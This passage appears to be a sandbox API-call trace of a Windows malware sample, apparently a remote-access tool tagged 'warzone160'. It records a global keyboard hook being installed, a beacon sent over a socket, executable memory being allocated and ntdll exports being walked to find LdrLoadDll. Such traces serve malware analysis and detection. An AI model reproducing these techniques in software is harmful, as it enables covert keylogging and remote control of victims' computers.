[0199.372] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="DelayLoadFailureHook" | out: DestinationString="DelayLoadFailureHook") [0199.372] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="DelayLoadFailureHook", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x762bec9d) returned 0x0 [0199.372] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GlobalAddAtomA" | out: DestinationString="GlobalAddAtomA") [0199.372] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GlobalAddAtomA", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76240526) returned 0x0 [0199.372] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetModuleHandleA" | out: DestinationString="GetModuleHandleA") [0199.373] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetModuleHandleA", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76221245) returned 0x0 [0199.373] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetModuleFileNameA" | out: DestinationString="GetModuleFileNameA") [0199.373] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetModuleFileNameA", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x762214b1) returned 0x0 [0199.373] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GlobalFindAtomA" | out: DestinationString="GlobalFindAtomA") [0199.373] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GlobalFindAtomA", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x7624d358) returned 0x0 [0199.373] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="lstrlenA" | out: DestinationString="lstrlenA") [0199.373] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="lstrlenA", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76225a4b) returned 0x0 [0199.373] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetTickCount" | out: DestinationString="GetTickCount") [0199.374] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetTickCount", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x7622110c) returned 0x0 [0199.374] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="QueryPerformanceFrequency" | out: DestinationString="QueryPerformanceFrequency") [0199.374] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="QueryPerformanceFrequency", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x762241f0) returned 0x0 [0199.374] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="QueryPerformanceCounter" | out: DestinationString="QueryPerformanceCounter") [0199.374] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="QueryPerformanceCounter", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76221725) returned 0x0 [0199.374] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="LCMapStringW" | out: DestinationString="LCMapStringW") [0199.374] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="LCMapStringW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x762217b9) returned 0x0 [0199.374] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CreateFileMappingW" | out: DestinationString="CreateFileMappingW") [0199.375] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="CreateFileMappingW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76221909) returned 0x0 [0199.375] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="MapViewOfFile" | out: DestinationString="MapViewOfFile") [0199.375] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="MapViewOfFile", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x762218f1) returned 0x0 [0199.375] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetFileSize" | out: DestinationString="GetFileSize") [0199.375] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetFileSize", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x7622196e) returned 0x0 [0199.375] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="UnmapViewOfFile" | out: DestinationString="UnmapViewOfFile") [0199.375] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="UnmapViewOfFile", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76221826) returned 0x0 [0199.375] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="WerpNotifyLoadStringResource" | out: DestinationString="WerpNotifyLoadStringResource") [0199.376] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="WerpNotifyLoadStringResource", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x762ae085) returned 0x0 [0199.376] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetSystemDefaultLangID" | out: DestinationString="GetSystemDefaultLangID") [0199.376] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetSystemDefaultLangID", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x7624d346) returned 0x0 [0199.376] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RegQueryInfoKeyW" | out: DestinationString="RegQueryInfoKeyW") [0199.376] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="RegQueryInfoKeyW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x762281c5) returned 0x0 [0199.376] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RegEnumValueW" | out: DestinationString="RegEnumValueW") [0199.376] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="RegEnumValueW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76227e40) returned 0x0 [0199.376] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RegOpenKeyExW" | out: DestinationString="RegOpenKeyExW") [0199.376] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="RegOpenKeyExW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76222311) returned 0x0 [0199.376] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RegQueryValueExW" | out: DestinationString="RegQueryValueExW") [0199.377] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="RegQueryValueExW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76221f4e) returned 0x0 [0199.377] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetVersionExW" | out: DestinationString="GetVersionExW") [0199.377] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetVersionExW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76221ae5) returned 0x0 [0199.377] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="IsDBCSLeadByte" | out: DestinationString="IsDBCSLeadByte") [0199.377] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="IsDBCSLeadByte", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76221748) returned 0x0 [0199.377] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="WerpNotifyUseStringResource" | out: DestinationString="WerpNotifyUseStringResource") [0199.377] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="WerpNotifyUseStringResource", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x762ae095) returned 0x0 [0199.377] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetCurrentProcessId" | out: DestinationString="GetCurrentProcessId") [0199.377] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetCurrentProcessId", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x762211f8) returned 0x0 [0199.377] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="ProcessIdToSessionId" | out: DestinationString="ProcessIdToSessionId") [0199.378] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="ProcessIdToSessionId", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76221275) returned 0x0 [0199.378] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="MulDiv" | out: DestinationString="MulDiv") [0199.378] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="MulDiv", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76221b80) returned 0x0 [0199.378] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetThreadLocale" | out: DestinationString="GetThreadLocale") [0199.378] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetThreadLocale", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x762235cf) returned 0x0 [0199.378] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="FindFirstFileW" | out: DestinationString="FindFirstFileW") [0199.378] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="FindFirstFileW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76224435) returned 0x0 [0199.378] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="FindNextFileW" | out: DestinationString="FindNextFileW") [0199.379] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="FindNextFileW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x762254ee) returned 0x0 [0199.379] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="FindClose" | out: DestinationString="FindClose") [0199.379] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="FindClose", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76224442) returned 0x0 [0199.379] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetLogicalDrives" | out: DestinationString="GetLogicalDrives") [0199.379] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetLogicalDrives", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76225371) returned 0x0 [0199.379] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="lstrlenW" | out: DestinationString="lstrlenW") [0199.379] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="lstrlenW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76221700) returned 0x0 [0199.379] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="SetCurrentDirectoryW" | out: DestinationString="SetCurrentDirectoryW") [0199.379] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="SetCurrentDirectoryW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76231260) returned 0x0 [0199.379] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetCurrentDirectoryW" | out: DestinationString="GetCurrentDirectoryW") [0199.380] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetCurrentDirectoryW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76225611) returned 0x0 [0199.380] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x326f984, Source="ADVAPI32.dll" | out: Destination="ADVAPI32.dll") returned 1 [0199.380] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ADVAPI32.dll", BaseAddress=0x326f9a4 | out: BaseAddress=0x326f9a4*=0x76470000) returned 0x0 [0199.393] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x326f798, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\chfiqxtpqp.exe")) returned 0x3c [0199.396] RtlInitUnicodeString (in: DestinationString=0x326f760, SourceString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe" | out: DestinationString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe") [0199.396] NtUserSetWindowsHookEx (Mod=0x400000, UnsafeModuleName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", ThreadId=0x0, HookId=13, HookProc=0x4076e2, Ansi=1) returned 0x5015b [0199.409] GetMessageA (lpMsg=0x326fa0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 210 os_tid = 0x364 [0199.023] GetProcessHeap () returned 0x900000 [0199.023] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4) returned 0x934878 [0199.023] GetProcessHeap () returned 0x900000 [0199.023] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4) returned 0x934958 [0199.024] GetProcessHeap () returned 0x900000 [0199.024] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x934958, Size=0x8) returned 0x934968 [0199.024] GetProcessHeap () returned 0x900000 [0199.024] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x934968, Size=0xc) returned 0x96e790 [0199.024] GetProcessHeap () returned 0x900000 [0199.024] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x96e790, Size=0x10) returned 0x96e748 [0199.024] GetProcessHeap () returned 0x900000 [0199.024] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x10) returned 0x96e790 [0199.024] GetProcessHeap () returned 0x900000 [0199.024] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0199.024] GetProcessHeap () returned 0x900000 [0199.024] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e748 | out: hHeap=0x900000) returned 1 [0199.024] lstrlenA (lpString="warzone160") returned 10 [0199.024] lstrlenA (lpString="warzone160") returned 10 [0199.024] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2cd0000 [0199.024] lstrcpyA (in: lpString1=0x2cd0000, lpString2="warzone160" | out: lpString1="warzone160") returned="warzone160" [0199.025] lstrlenA (lpString="warzone160") returned 10 [0199.025] GetProcessHeap () returned 0x900000 [0199.025] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e748 [0199.025] VirtualFree (lpAddress=0x2cd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.025] GetProcessHeap () returned 0x900000 [0199.025] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x10) returned 0x96e760 [0199.025] GetProcessHeap () returned 0x900000 [0199.025] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e7a8 [0199.025] GetProcessHeap () returned 0x900000 [0199.025] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x10) returned 0x96e7c0 [0199.025] GetProcessHeap () returned 0x900000 [0199.025] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x10) returned 0x96e7d8 [0199.025] GetProcessHeap () returned 0x900000 [0199.025] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e7c0 | out: hHeap=0x900000) returned 1 [0199.025] GetProcessHeap () returned 0x900000 [0199.025] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e7a8 | out: hHeap=0x900000) returned 1 [0199.025] GetProcessHeap () returned 0x900000 [0199.025] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e760 | out: hHeap=0x900000) returned 1 [0199.026] send (s=0x228, buf=0x96e7d8*, len=16, flags=0) returned 16 [0199.026] GetProcessHeap () returned 0x900000 [0199.026] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e7d8 | out: hHeap=0x900000) returned 1 [0199.026] GetProcessHeap () returned 0x900000 [0199.026] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e748 | out: hHeap=0x900000) returned 1 [0199.026] GetProcessHeap () returned 0x900000 [0199.026] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e790 | out: hHeap=0x900000) returned 1 [0199.026] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0202.187] GetProcessHeap () returned 0x900000 [0202.187] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x7fa00) returned 0x3560020 [0202.193] GetProcessHeap () returned 0x900000 [0202.193] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x7fa00) returned 0x4360020 [0202.200] GetProcessHeap () returned 0x900000 [0202.200] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x7fa00) returned 0x43e0020 [0202.204] GetProcessHeap () returned 0x900000 [0202.205] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4360020 | out: hHeap=0x900000) returned 1 [0202.207] VirtualAlloc (lpAddress=0x0, dwSize=0x84000, flAllocationType=0x3000, flProtect=0x40) returned 0x4460000 [0202.217] lstrcmpA (lpString1="A_SHAFinal", lpString2="LdrLoadDll") returned -1 [0202.217] lstrcmpA (lpString1="A_SHAInit", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="A_SHAUpdate", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="LdrLoadDll") returned -1 [0202.218] lstrcmpA (lpString1="CsrClientCallServer", lpString2="LdrLoadDll") returned -1 [0202.219] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="LdrLoadDll") returned -1 [0202.219] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="LdrLoadDll") returned -1 [0202.219] lstrcmpA (lpString1="CsrGetProcessId", lpString2="LdrLoadDll") returned -1 [0202.219] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="LdrLoadDll") returned -1 [0202.219] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="LdrLoadDll") returned -1 [0202.219] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="LdrLoadDll") returned -1 [0202.219] lstrcmpA (lpString1="DbgBreakPoint", lpString2="LdrLoadDll") returned -1 [0202.219] lstrcmpA (lpString1="DbgPrint", lpString2="LdrLoadDll") returned -1 [0202.219] lstrcmpA (lpString1="DbgPrintEx", lpString2="LdrLoadDll") returned -1 [0202.219] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="LdrLoadDll") returned -1 [0202.219] lstrcmpA (lpString1="DbgPrompt", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="DbgUiContinue", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="EtwEventEnabled", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="EtwEventRegister", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="EtwEventUnregister", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="EtwEventWrite", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="EtwEventWriteString", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="LdrLoadDll") returned -1 [0202.220] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="EtwReplyNotification", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="EtwSendNotification", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="EtwSetMark", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="EtwTraceMessage", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="EtwpNotificationThread", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="KiFastSystemCall", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="KiFastSystemCallRet", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="KiIntSystemCall", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="LdrAccessResource", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="LdrAddRefDll", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="LdrEnumResources", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="LdrLoadDll") returned -1 [0202.221] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="LdrLoadDll") returned -1 [0202.222] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="LdrLoadDll") returned -1 [0202.222] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="LdrLoadDll") returned -1 [0202.222] lstrcmpA (lpString1="LdrFindResource_U", lpString2="LdrLoadDll") returned -1 [0202.222] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="LdrLoadDll") returned -1 [0202.222] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="LdrLoadDll") returned -1 [0202.222] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="LdrLoadDll") returned -1 [0202.222] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="LdrLoadDll") returned -1 [0202.222] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="LdrLoadDll") returned -1 [0202.222] lstrcmpA (lpString1="LdrGetFailureData", lpString2="LdrLoadDll") returned -1 [0202.222] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="LdrLoadDll") returned -1 [0202.222] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="LdrLoadDll") returned -1 [0202.222] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="LdrLoadDll") returned -1 [0202.222] lstrcmpA (lpString1="LdrHotPatchRoutine", lpString2="LdrLoadDll") returned -1 [0202.222] lstrcmpA 